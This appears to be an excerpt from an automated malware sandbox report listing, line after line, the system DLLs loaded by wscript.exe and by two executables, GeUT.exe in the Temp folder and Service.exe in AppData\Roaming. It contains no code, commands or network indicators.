Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sxs.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: scrrun.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: edputil.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: textinputframework.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: coreuicomponents.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Service.exe	Section loaded: vcruntime140_clr0400.dll
